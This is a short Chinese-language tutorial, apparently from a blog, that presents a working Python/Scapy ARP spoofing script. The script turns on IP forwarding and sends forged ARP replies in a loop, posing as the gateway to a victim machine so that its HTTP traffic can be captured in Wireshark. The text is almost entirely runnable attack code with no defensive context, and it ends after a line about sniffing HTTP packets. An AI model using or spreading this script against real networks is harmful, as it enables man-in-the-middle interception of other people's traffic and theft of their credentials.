python编写ARP拒绝服务攻击脚本–网路嗅探
**
(一)在前面的攻击脚本进行改进,配合 wireshark进行抓取,相比拒绝服务攻击脚 本、开启转发功能,使被攻击机能访问外部网络
**
from scapy.all import *
import uuid
import os
os.system('echo 1 >/proc/sys/net/ipv4/ip_forward') # 1 表示开启转发、0 表示不转发
def getselfMAC():
mac= uuid.UUID(int = uuid.getnode()).hex[-12:]
return ":".join([mac[e:e+2] for e in range(0,11,2)])
def arpspoof():
gwIP = input('请输入网关地址:')
mislendingIP = input("请输入攻击机地址:")
mlmac = getmacbyip(mislendingIP)
eth = Ether(dst=mlmac)
arp = ARP(op=2,hwsrc=getselfMAC(),psrc=gwIP,hwdst=mlmac,pdst=mislendingIP)
sendp(eth/arp,inter=2,loop=1)
arpspoof()
(二)通过wireshare进行抓包分析:
通常是抓取http协议的包